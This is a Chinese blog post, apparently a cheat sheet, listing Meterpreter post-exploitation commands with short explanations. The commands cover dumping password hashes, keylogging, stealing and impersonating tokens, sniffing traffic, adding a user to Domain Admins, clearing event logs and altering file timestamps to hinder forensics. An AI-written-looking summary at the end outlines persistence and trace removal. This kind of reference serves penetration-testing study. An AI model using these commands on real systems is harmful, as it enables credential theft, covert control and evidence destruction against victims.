[后渗透]获取到 Meterpreter 之后的操作

[后渗透]获取到 Meterpreter 之后的操作

本文章向大家介绍[后渗透]获取到 Meterpreter 之后的操作,主要包括[后渗透]获取到 Meterpreter 之后的操作使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
sysinfo
列出受控主机的系统信息

ls
列出目标主机的文件和文件夹信息

use priv
加载特权提升扩展模块,来扩展meterpreter库

ps
显示所有运行进程以及关联的用户账户

getsystem
通过各种攻击向量来提升到系统用户权限

shell
以所有可用令牌来运行一个交互的shell

screenshot
对目标主机的屏幕进行截图

upload file
向目标主机上传文件

download file
从目标主机下载文件

keyscan_dump
存储目标主机上或许的键盘记录

getprivs
尽可能多的获取目标主机上的特权

background
将你当前的meterpreter shell转为后台执行

hashdump
导出目标主机中的口令哈希值
help
打开帮助

run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名

migrate PID
迁移到一个指定的进程ID

use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)

list_tokens -u
列出目标主机用户组的可用令牌

impersonate_token DOMAIN_NAME\USERNAME
假冒目标主机上的可用令牌。

steal_token
盗窃给定进程的可用令牌并进行令牌假冒

drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。

reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。

setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。

uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块

sniffer_interfaces
列出目标主机所有开放的网络接口

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探

sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据

sniffer_stop interfaceID
停止嗅探
add_user username password -h ip
在远程目标主机上添加一个用户

add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中

clearev
清除目标主机上的日志记录

timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)

reboot
重启目标主机

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值